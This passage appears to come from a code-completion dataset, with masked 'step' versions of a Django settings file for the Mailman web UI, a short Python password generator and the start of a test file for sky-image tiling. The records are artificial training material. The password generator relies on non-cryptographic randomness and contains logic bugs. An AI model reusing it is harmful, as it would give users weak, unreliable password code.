"step-4": "<mask token>\nfrom os.path import abspath, dirname, join as joinpath\nfrom ConfigParser import SafeConfigParser\n\n\ndef read_cfg(path, section=None, option=None):\n config = SafeConfigParser()\n config.read(path)\n\n def get(section, option):\n return config.get(section, option) if config.has_option(section, option\n ) else None\n return get(section, option) if section else get\n\n\nmailman_cfg = read_cfg('/etc/mailman.cfg')\nBASE_DIR = '/usr/lib/bundles/mailman-webui'\nCONF_DIR = '/etc/mailman-webui'\nDATA_DIR = '/var/lib/mailman-webui'\nLOG_DIR = '/var/log/mailman-webui'\nALLOWED_HOSTS = ['localhost']\nMAILMAN_REST_API_URL = 'http://localhost:%s' % (mailman_cfg('webservice',\n 'port') or 8001)\nMAILMAN_REST_API_USER = mailman_cfg('webservice', 'admin_user') or 'restadmin'\nMAILMAN_REST_API_PASS = mailman_cfg('webservice', 'admin_pass')\nMAILMAN_ARCHIVER_KEY = read_cfg('/etc/mailman.d/hyperkitty.cfg', 'general',\n 'api_key')\nMAILMAN_ARCHIVER_FROM = '127.0.0.1', '::1', '::ffff:127.0.0.1'\nREST_FRAMEWORK = {'PAGE_SIZE': 10}\nFILTER_VHOST = False\nSITE_ID = 1\nINSTALLED_APPS = ('django.contrib.admin', 'django.contrib.auth',\n 'django.contrib.contenttypes', 'django.contrib.sessions',\n 'django.contrib.sites', 'django.contrib.messages',\n 'django.contrib.staticfiles', 'hyperkitty', 'rest_framework',\n 'django_gravatar', 'paintstore', 'compressor', 'haystack',\n 'django_extensions', 'postorius', 'django_mailman3', 'stronghold',\n 'allauth', 'allauth.account', 'allauth.socialaccount')\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django_mailman3.middleware.TimezoneMiddleware',\n 'postorius.middleware.PostoriusMiddleware')\nROOT_URLCONF = 'urls'\nTEMPLATES = [{'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [joinpath(DATA_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS':\n {'context_processors': ['django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.template.context_processors.csrf',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django_mailman3.context_processors.common',\n 'hyperkitty.context_processors.common',\n 'postorius.context_processors.postorius']}}]\nWSGI_APPLICATION = 'wsgi.application'\nDATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3', 'NAME':\n joinpath(DATA_DIR, 'db.sqlite3')}}\nHAYSTACK_CONNECTIONS = {'default': {'ENGINE':\n 'haystack.backends.whoosh_backend.WhooshEngine', 'PATH': joinpath(\n DATA_DIR, 'fulltext_index')}}\nEMAIL_HOST = mailman_cfg('mta', 'smtp_host') or 'localhost'\nEMAIL_PORT = int(mailman_cfg('mta', 'smtp_port') or 25)\nEMAIL_HOST_USER = mailman_cfg('mta', 'smtp_user') or ''\nEMAIL_HOST_PASSWORD = mailman_cfg('mta', 'smtp_pass') or ''\nEMAIL_USE_TLS = False\nEMAIL_USE_SSL = False\nADMINS = ('Mailman Admin', 'root@localhost'),\nSECRET_KEY = open(joinpath(CONF_DIR, 'secret_key')).read()\nCSRF_COOKIE_SECURE = True\nCSRF_COOKIE_HTTPONLY = True\nSESSION_COOKIE_SECURE = True\nSECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_BROWSER_XSS_FILTER = True\nX_FRAME_OPTIONS = 'DENY'\nUSE_X_FORWARDED_HOST = True\nSECURE_PROXY_SSL_HEADER = 'HTTP_X_FORWARDED_PROTO', 'https'\nAUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend')\nLOGIN_URL = 'account_login'\nLOGIN_REDIRECT_URL = 'hk_root'\nLOGOUT_URL = 'account_logout'\nREGISTRATION_OPEN = True\nAUTH_PASSWORD_VALIDATORS = [{'NAME':\n 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'\n }, {'NAME':\n 'django.contrib.auth.password_validation.MinimumLengthValidator'}, {\n 'NAME':\n 'django.contrib.auth.password_validation.CommonPasswordValidator'}, {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator'}\n ]\nSTRONGHOLD_PUBLIC_URLS = '^/accounts/.*', '^/archives/api/mailman/.*'\nACCOUNT_ADAPTER = 'custom.CloseableRegistrationAccountAdapter'\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_DEFAULT_HTTP_PROTOCOL = 'https'\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_LOGOUT_ON_GET = False\nSOCIALACCOUNT_PROVIDERS = {}\nif 'custom.LDAPBackend' in AUTHENTICATION_BACKENDS:\n import ldap\n from django_auth_ldap.config import LDAPSearch\n ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, '/etc/ssl/certs')\n AUTH_LDAP_SERVER_URI = 'ldaps://ldap.example.org'\n AUTH_LDAP_USER_SEARCH = LDAPSearch('ou=People,dc=example,dc=org', ldap.\n SCOPE_SUBTREE, '(&(mail=*)(uid=%(user)s))')\n AUTH_LDAP_USER_ATTR_MAP = {'first_name': 'givenName', 'last_name': 'sn',\n 'email': 'mail'}\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_ROOT = joinpath(BASE_DIR, 'static')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder')\nCOMPRESS_OFFLINE = True\nfrom django.contrib.messages import constants as messages\nMESSAGE_TAGS = {messages.ERROR: 'danger'}\nGRAVATAR_URL = 'http://cdn.libravatar.org/'\nGRAVATAR_SECURE_URL = 'https://seccdn.libravatar.org/'\nGRAVATAR_DEFAULT_IMAGE = 'retro'\nGRAVATAR_DEFAULT_SECURE = True\nLOGGING = {'version': 1, 'disable_existing_loggers': False, 'filters': {\n 'require_debug_false': {'()': 'django.utils.log.RequireDebugFalse'}},\n 'handlers': {'console': {'class': 'logging.StreamHandler', 'formatter':\n 'simple'}, 'file': {'level': 'INFO', 'class':\n 'logging.handlers.WatchedFileHandler', 'filename': joinpath(LOG_DIR,\n 'mailman-webui.log'), 'formatter': 'verbose'}, 'mail_admins': {'level':\n 'ERROR', 'filters': ['require_debug_false'], 'class':\n 'django.utils.log.AdminEmailHandler'}}, 'loggers': {'django.request': {\n 'handlers': ['file'], 'level': 'ERROR', 'propagate': True}, 'django': {\n 'handlers': ['file'], 'level': 'ERROR', 'propagate': True}, 'postorius':\n {'handlers': ['file'], 'level': 'INFO', 'propagate': True},\n 'hyperkitty': {'handlers': ['file'], 'level': 'INFO', 'propagate': True\n }}, 'formatters': {'verbose': {'format':\n '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n }, 'simple': {'format': '%(levelname)s %(message)s'}}, 'root': {\n 'handlers': ['file'], 'level': 'INFO'}}\nif 'raven.contrib.django.raven_compat' in INSTALLED_APPS:\n RAVEN_CONFIG = {'dsn': 'https://<key>:<secret>@sentry.io/<project>'}\n LOGGING['handlers']['sentry'] = {'level': 'ERROR', 'class':\n 'raven.contrib.django.raven_compat.handlers.SentryHandler'}\n LOGGING['loggers']['root']['handlers'].append('sentry')\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n",
"step-5": "#-*- coding: utf-8 -*-\n\"\"\"\nDjango settings for HyperKitty + Postorius\n\nPay attention to settings ALLOWED_HOSTS and DATABASES!\n\"\"\"\nfrom os.path import abspath, dirname, join as joinpath\nfrom ConfigParser import SafeConfigParser\n\n\ndef read_cfg(path, section=None, option=None):\n config = SafeConfigParser()\n config.read(path)\n def get(section, option):\n return config.get(section, option) if config.has_option(section, option) else None\n return get(section, option) if section else get\n\nmailman_cfg = read_cfg('/etc/mailman.cfg')\n\n\nBASE_DIR = '/usr/lib/bundles/mailman-webui'\nCONF_DIR = '/etc/mailman-webui'\nDATA_DIR = '/var/lib/mailman-webui'\nLOG_DIR = '/var/log/mailman-webui'\n\n# Hosts/domain names that are valid for this site.\n# NOTE: You MUST add domain name of your instance of this application here!\n# See https://docs.djangoproject.com/en/1.9/ref/settings/#allowed-hosts\nALLOWED_HOSTS = ['localhost']\n\n# Mailman API credentials\n# NOTE: Replace with hard-coded values if Mailman is running on a different host.\nMAILMAN_REST_API_URL = 'http://localhost:%s' % (mailman_cfg('webservice', 'port') or 8001)\nMAILMAN_REST_API_USER = mailman_cfg('webservice', 'admin_user') or 'restadmin'\nMAILMAN_REST_API_PASS = mailman_cfg('webservice', 'admin_pass')\nMAILMAN_ARCHIVER_KEY = read_cfg('/etc/mailman.d/hyperkitty.cfg', 'general', 'api_key')\nMAILMAN_ARCHIVER_FROM = ('127.0.0.1', '::1', '::ffff:127.0.0.1')\n\n# REST API\nREST_FRAMEWORK = {\n 'PAGE_SIZE': 10,\n}\n\n# Only display mailing-lists in HyperKitty from the same virtual host\n# as the webserver.\nFILTER_VHOST = False\n\n\n#\n# Application definition\n#\n\nSITE_ID = 1\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'hyperkitty',\n 'rest_framework',\n 'django_gravatar',\n 'paintstore',\n 'compressor',\n 'haystack',\n 'django_extensions',\n 'postorius',\n 'django_mailman3',\n 'stronghold',\n\n # Uncomment the next line to enable integration with Sentry\n # and set DSN in RAVEN_CONFIG.\n #'raven.contrib.django.raven_compat',\n\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n # Uncomment providers that you want to use, if any.\n #'allauth.socialaccount.providers.openid',\n #'allauth.socialaccount.providers.github',\n #'allauth.socialaccount.providers.gitlab',\n #'allauth.socialaccount.providers.google',\n #'allauth.socialaccount.providers.twitter',\n #'allauth.socialaccount.providers.stackexchange',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django_mailman3.middleware.TimezoneMiddleware',\n 'postorius.middleware.PostoriusMiddleware',\n\n # Uncomment to require a user to be authenticated to view any page.\n #'stronghold.middleware.LoginRequiredMiddleware',\n)\n\n# A string representing the full Python import path to your root URLconf.\nROOT_URLCONF = 'urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n # Directory for templates override.\n joinpath(DATA_DIR, 'templates'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.template.context_processors.csrf',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django_mailman3.context_processors.common',\n 'hyperkitty.context_processors.common',\n 'postorius.context_processors.postorius',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'wsgi.application'\n\n# Using the cache infrastructure can significantly improve performance on a\n# production setup. This is an example with a local Memcached server.\n#CACHES = {\n# 'default': {\n# 'BACKEND': 'django.core.cache.backends.memcached.PyLibMCCache',\n# 'LOCATION': '127.0.0.1:11211',\n# }\n#}\n\n\n#\n# Databases\n# See https://docs.djangoproject.com/en/1.9/ref/settings/#databases\n#\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': joinpath(DATA_DIR, 'db.sqlite3'),\n }\n# Remove the above lines and uncomment the below to use PostgreSQL.\n# 'default': {\n# 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n# 'NAME': 'mailman_webui',\n# 'USER': 'mailman_webui',\n# 'PASSWORD': 'change-me',\n# # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.\n# 'HOST': '127.0.0.1',\n# 'PORT': '',\n# }\n}\n\n# Full-text search engine\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',\n 'PATH': joinpath(DATA_DIR, 'fulltext_index'),\n },\n}\n\n\n#\n# Outgoing mails\n#\n\n# NOTE: Replace with hard-coded values if Mailman is running on a different host.\n\n# The host and port of the SMTP server to use for sending email.\nEMAIL_HOST = mailman_cfg('mta', 'smtp_host') or 'localhost'\nEMAIL_PORT = int(mailman_cfg('mta', 'smtp_port') or 25)\n\n# Username and password to use for the SMTP server defined above.\nEMAIL_HOST_USER = mailman_cfg('mta', 'smtp_user') or ''\nEMAIL_HOST_PASSWORD = mailman_cfg('mta', 'smtp_pass') or ''\n\n# Whether to use a explicit TLS connection when talking to the SMTP server.\nEMAIL_USE_TLS = False\n\n# Whether to use an implicit TLS connection when talking to the SMTP server.\nEMAIL_USE_SSL = False\n\n# A tuple that lists people who get code error notifications. When DEBUG=False\n# and a view raises an exception, Django will email these people with the full\n# exception information. Each member of the tuple should be a tuple of (Full\n# name, email address).\nADMINS = (\n ('Mailman Admin', 'root@localhost'),\n)\n\n# If you enable email reporting for error messages, this is where those emails\n# will appear to be coming from. Make sure you set a valid domain name,\n# otherwise the emails may get rejected.\n# https://docs.djangoproject.com/en/1.9/ref/settings/#std:setting-SERVER_EMAIL\n#SERVER_EMAIL = '[email protected]'\n\n# If you enable internal authentication, this is the address that the emails\n# will appear to be coming from. Make sure you set a valid domain name,\n# otherwise the emails may get rejected.\n# https://docs.djangoproject.com/en/1.9/ref/settings/#default-from-email\n#DEFAULT_FROM_EMAIL = '[email protected]'\n\n\n#\n# Security settings\n#\n\n# A secret key used for signing sessions, cookies, password reset tokens etc.\nSECRET_KEY = open(joinpath(CONF_DIR, 'secret_key')).read()\n\nCSRF_COOKIE_SECURE = True\nCSRF_COOKIE_HTTPONLY = True\nSESSION_COOKIE_SECURE = True\nSECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_BROWSER_XSS_FILTER = True\nX_FRAME_OPTIONS = 'DENY'\n\n# If you're behind a proxy, use the X-Forwarded-Host header\n# See https://docs.djangoproject.com/en/1.9/ref/settings/#use-x-forwarded-host\nUSE_X_FORWARDED_HOST = True\n\n# And if your proxy does your SSL encoding for you, set SECURE_PROXY_SSL_HEADER\n# https://docs.djangoproject.com/en/1.9/ref/settings/#secure-proxy-ssl-header\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\n#SECURE_SSL_REDIRECT = True\n\n# If you set SECURE_SSL_REDIRECT to True, make sure the SECURE_REDIRECT_EXEMPT\n# contains at least this line:\n#SECURE_REDIRECT_EXEMPT = [\n# 'archives/api/mailman/.*', # Request from Mailman.\n#]\n\n\n#\n# Authentication\n#\n\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n # Uncomment to next line to enable LDAP authentication.\n #'custom.LDAPBackend',\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\n\nLOGIN_URL = 'account_login'\nLOGIN_REDIRECT_URL = 'hk_root'\nLOGOUT_URL = 'account_logout'\n\n# Whether registration of new accounts is currently permitted.\nREGISTRATION_OPEN = True\n\n# Password validation\n# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators\nAUTH_PASSWORD_VALIDATORS = [\n { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator' },\n { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator' },\n { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator' },\n { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator' },\n]\n\n# URLs which are ignored by LoginRequiredMiddleware, i.e. the middleware\n# does not *force* them to require authentication.\nSTRONGHOLD_PUBLIC_URLS = (\n r'^/accounts/.*',\n r'^/archives/api/mailman/.*',\n)\n\n## Django Allauth\n\n# Custom AccountAdapter for allauth that respects REGISTRATION_OPEN variable.\nACCOUNT_ADAPTER = 'custom.CloseableRegistrationAccountAdapter'\n\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_DEFAULT_HTTP_PROTOCOL = 'https'\nACCOUNT_UNIQUE_EMAIL = True\n\n# Whether to disable intermediate logout page.\nACCOUNT_LOGOUT_ON_GET = False\n\nSOCIALACCOUNT_PROVIDERS = {}\n#SOCIALACCOUNT_PROVIDERS = {\n# 'openid': {\n# 'SERVERS': [\n# {\n# 'id': 'yahoo',\n# 'name': 'Yahoo',\n# 'openid_url': 'http://me.yahoo.com'\n# }\n# ],\n# },\n# 'google': {\n# 'SCOPE': ['profile', 'email'],\n# 'AUTH_PARAMS': {'access_type': 'online'},\n# },\n# 'facebook': {\n# 'METHOD': 'oauth2',\n# 'SCOPE': ['email'],\n# 'FIELDS': [\n# 'email',\n# 'name',\n# 'first_name',\n# 'last_name',\n# 'locale',\n# 'timezone',\n# ],\n# 'VERSION': 'v2.4',\n# },\n#}\n\n## Django LDAP\nif 'custom.LDAPBackend' in AUTHENTICATION_BACKENDS:\n import ldap\n from django_auth_ldap.config import LDAPSearch\n\n ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, '/etc/ssl/certs')\n\n AUTH_LDAP_SERVER_URI = 'ldaps://ldap.example.org'\n\n AUTH_LDAP_USER_SEARCH = LDAPSearch(\n 'ou=People,dc=example,dc=org',\n ldap.SCOPE_SUBTREE,\n '(&(mail=*)(uid=%(user)s))'\n )\n\n AUTH_LDAP_USER_ATTR_MAP = {\n 'first_name': 'givenName',\n 'last_name': 'sn',\n 'email': 'mail',\n }\n\n\n#\n# Internationalization\n# https://docs.djangoproject.com/en/1.9/topics/i18n/\n#\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n\n#\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.9/howto/static-files/\n#\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/var/www/example.com/static/\"\nSTATIC_ROOT = joinpath(BASE_DIR, 'static')\n\n# URL prefix for static files.\n# Example: \"http://example.com/static/\", \"http://static.example.com/\"\nSTATIC_URL = '/static/'\n\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\".\n # Don't forget to use absolute paths, not relative paths.\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n)\n\n# django-compressor\nCOMPRESS_OFFLINE = True\n\n# Compatibility with Bootstrap 3\nfrom django.contrib.messages import constants as messages\nMESSAGE_TAGS = {\n messages.ERROR: 'danger'\n}\n\n\n#\n# Gravatar\n# https://github.com/twaddington/django-gravatar\n#\n\n# Gravatar base url.\nGRAVATAR_URL = 'http://cdn.libravatar.org/'\n# Gravatar base secure https url.\nGRAVATAR_SECURE_URL = 'https://seccdn.libravatar.org/'\n# Gravatar size in pixels.\n#GRAVATAR_DEFAULT_SIZE = '80'\n# An image url or one of the following: 'mm', 'identicon', 'monsterid', 'wavatar', 'retro'.\nGRAVATAR_DEFAULT_IMAGE = 'retro'\n# One of the following: 'g', 'pg', 'r', 'x'.\n#GRAVATAR_DEFAULT_RATING = 'g'\n# True to use https by default, False for plain http.\nGRAVATAR_DEFAULT_SECURE = True\n\n\n#\n# Logging\n#\n\n# A sample logging configuration. The only tangible logging performed by this\n# configuration is to send an email to the site admins on every HTTP 500 error\n# when DEBUG=False. See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple',\n },\n 'file':{\n 'level': 'INFO',\n #'class': 'logging.handlers.RotatingFileHandler',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': joinpath(LOG_DIR, 'mailman-webui.log'),\n 'formatter': 'verbose',\n },\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n },\n 'loggers': {\n #'django.request': {\n # 'handlers': ['mail_admins'],\n # 'level': 'ERROR',\n # 'propagate': True,\n #},\n 'django.request': {\n 'handlers': ['file'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'django': {\n 'handlers': ['file'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'postorius': {\n 'handlers': ['file'],\n 'level': 'INFO',\n 'propagate': True,\n },\n 'hyperkitty': {\n 'handlers': ['file'],\n 'level': 'INFO',\n 'propagate': True,\n },\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'root': {\n 'handlers': ['file'],\n 'level': 'INFO',\n },\n}\n\nif 'raven.contrib.django.raven_compat' in INSTALLED_APPS:\n RAVEN_CONFIG = {\n 'dsn': 'https://<key>:<secret>@sentry.io/<project>',\n }\n LOGGING['handlers']['sentry'] = {\n 'level': 'ERROR',\n 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',\n }\n LOGGING['loggers']['root']['handlers'].append('sentry')\n\n\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import random
s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-/.,;'[]{}:<>?"
i = 0
fin = ""
while i == 0:
num = int(input("What length do you want? "))
password = "".join(random.sample(s, num))
print(password)
j = 0
while(j ==0):
want = input("Do you this password? (yes or no) ")
want.lower()
if want == "yes":
print("Your Password is " + password)
break
elif want == "no":
break
if want == "yes":
fin = input("Do you want a new password. yes or no? ")
fin.lower()
while j == 0:
if fin == "yes":
break
elif fin == "no":
break
if fin == "no":
print("This is your final password " + password)
break
|
normal
|
{
"blob_id": "3089dba0956151bd43e443b679ec0b24da644d08",
"index": 3701,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile i == 0:\n num = int(input('What length do you want? '))\n password = ''.join(random.sample(s, num))\n print(password)\n j = 0\n while j == 0:\n want = input('Do you this password? (yes or no) ')\n want.lower()\n if want == 'yes':\n print('Your Password is ' + password)\n break\n elif want == 'no':\n break\n if want == 'yes':\n fin = input('Do you want a new password. yes or no? ')\n fin.lower()\n while j == 0:\n if fin == 'yes':\n break\n elif fin == 'no':\n break\n if fin == 'no':\n print('This is your final password ' + password)\n break\n",
"step-3": "<mask token>\ns = (\n \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-/.,;'[]{}:<>?\"\n )\ni = 0\nfin = ''\nwhile i == 0:\n num = int(input('What length do you want? '))\n password = ''.join(random.sample(s, num))\n print(password)\n j = 0\n while j == 0:\n want = input('Do you this password? (yes or no) ')\n want.lower()\n if want == 'yes':\n print('Your Password is ' + password)\n break\n elif want == 'no':\n break\n if want == 'yes':\n fin = input('Do you want a new password. yes or no? ')\n fin.lower()\n while j == 0:\n if fin == 'yes':\n break\n elif fin == 'no':\n break\n if fin == 'no':\n print('This is your final password ' + password)\n break\n",
"step-4": "import random\ns = (\n \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-/.,;'[]{}:<>?\"\n )\ni = 0\nfin = ''\nwhile i == 0:\n num = int(input('What length do you want? '))\n password = ''.join(random.sample(s, num))\n print(password)\n j = 0\n while j == 0:\n want = input('Do you this password? (yes or no) ')\n want.lower()\n if want == 'yes':\n print('Your Password is ' + password)\n break\n elif want == 'no':\n break\n if want == 'yes':\n fin = input('Do you want a new password. yes or no? ')\n fin.lower()\n while j == 0:\n if fin == 'yes':\n break\n elif fin == 'no':\n break\n if fin == 'no':\n print('This is your final password ' + password)\n break\n",
"step-5": "import random\n\ns = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-/.,;'[]{}:<>?\"\ni = 0\nfin = \"\"\nwhile i == 0:\n num = int(input(\"What length do you want? \"))\n\n password = \"\".join(random.sample(s, num))\n\n print(password)\n j = 0\n while(j ==0):\n want = input(\"Do you this password? (yes or no) \")\n want.lower()\n if want == \"yes\":\n print(\"Your Password is \" + password)\n break\n elif want == \"no\":\n break\n if want == \"yes\":\n fin = input(\"Do you want a new password. yes or no? \")\n fin.lower()\n while j == 0:\n if fin == \"yes\":\n break\n elif fin == \"no\":\n break\n if fin == \"no\":\n print(\"This is your final password \" + password)\n break",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- mode: python; coding: utf-8 -*-
# Copyright 2019-2021 the AAS WorldWide Telescope project
# Licensed under the MIT License.
from __future__ import absolute_import, division, print_function
import numpy as np
import numpy.testing as nt
import os.path
import pytest
import sys
from xml.etree import ElementTree as etree
from . import assert_xml_elements_equal, test_path
from ..builder import Builder
from .. import cli
from .. import collection
from .. import multi_tan
try:
from astropy.io import fits
HAS_ASTRO = True
except ImportError:
HAS_ASTRO = False
try:
import reproject
HAS_REPROJECT = True
except ImportError:
HAS_REPROJECT = False
class TestMultiTan(object):
WTML = """
<Folder Browseable="True" Group="Explorer" Name="Toasty" Searchable="True">
<Place
Angle="0"
AngularSize="0"
Constellation="VIR"
DataSetType="Sky"
Dec="0.7438249862258411"
Magnitude="0"
Name="Toasty"
Opacity="100"
RA="14.41975153073335"
Rotation="0"
Thumbnail="thumb.jpg"
ZoomLevel="0.2437119999998555"
>
<ForegroundImageSet>
<ImageSet
BandPass="Visible"
BaseDegreesPerTile="0.023893333333319167"
BaseTileLevel="0"
BottomsUp="False"
CenterX="216.2962962963"
CenterY="0.74380165289257"
DataSetType="Sky"
ElevationModel="False"
FileType=".fits"
Generic="False"
Name="Toasty"
OffsetX="2.33333333333195e-05"
OffsetY="2.33333333333195e-05"
Projection="Tan"
QuadTreeMap=""
Rotation="-0"
Sparse="True"
StockSet="False"
TileLevels="1"
Url="{1}/{3}/{3}_{2}.fits"
WidthFactor="2"
>
<ThumbnailUrl>thumb.jpg</ThumbnailUrl>
</ImageSet>
</ForegroundImageSet>
</Place>
</Folder>"""
# Gross workaround for platform differences in the XML output.
if sys.platform == "darwin":
WTML = WTML.replace('Dec="0.7438249862258411"', 'Dec="0.743824986225841"')
# Back to the non-gross stuff.
def setup_method(self, method):
from tempfile import mkdtemp
self.work_dir = mkdtemp()
def teardown_method(self, method):
from shutil import rmtree
rmtree(self.work_dir)
def work_path(self, *pieces):
return os.path.join(self.work_dir, *pieces)
def test_basic(self):
coll = collection.SimpleFitsCollection([test_path("wcs512.fits.gz")])
proc = multi_tan.MultiTanProcessor(coll)
from ..pyramid import PyramidIO
pio = PyramidIO(self.work_path("basic"), default_format="fits")
builder = Builder(pio)
proc.compute_global_pixelization(builder)
proc.tile(pio)
BARY_SLICES = [
(slice(0, 128), slice(0, 128)),
(slice(0, 128), slice(128, None)),
(slice(128, None), slice(0, 128)),
(slice(128, None), slice(128, None)),
]
def maybe_test_barycenter(self, path, bary_expected):
"""
Check the barycenters of four 128x128 quadrants of a tile file. The idea
here is that if we introduce a problem with vertical flips in tiled FITS
processing, we'll detect it here.
"""
if not HAS_ASTRO:
return
with fits.open(path) as hdul:
data = hdul[0].data
data[~np.isfinite(data)] = 0.0
bary_observed = []
for islice in self.BARY_SLICES:
idata = data[islice]
yidx, xidx = np.indices((128, 128))
xbary = (idata * xidx).sum() / idata.sum()
ybary = (idata * yidx).sum() / idata.sum()
bary_observed.append((xbary, ybary))
nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)
WCS512_BARYDATA = [
(63.44949378800272, 64.40535387506924),
(63.24744175084746, 63.67473452789256),
(65.22950207855361, 63.35629429568745),
(62.027396724898814, 62.815937534782144),
]
def test_basic_cli(self):
"""
Test the CLI interface. We don't go out of our way to validate the
computations in detail -- that's for the unit tests that probe the
module directly.
"""
expected = etree.fromstring(
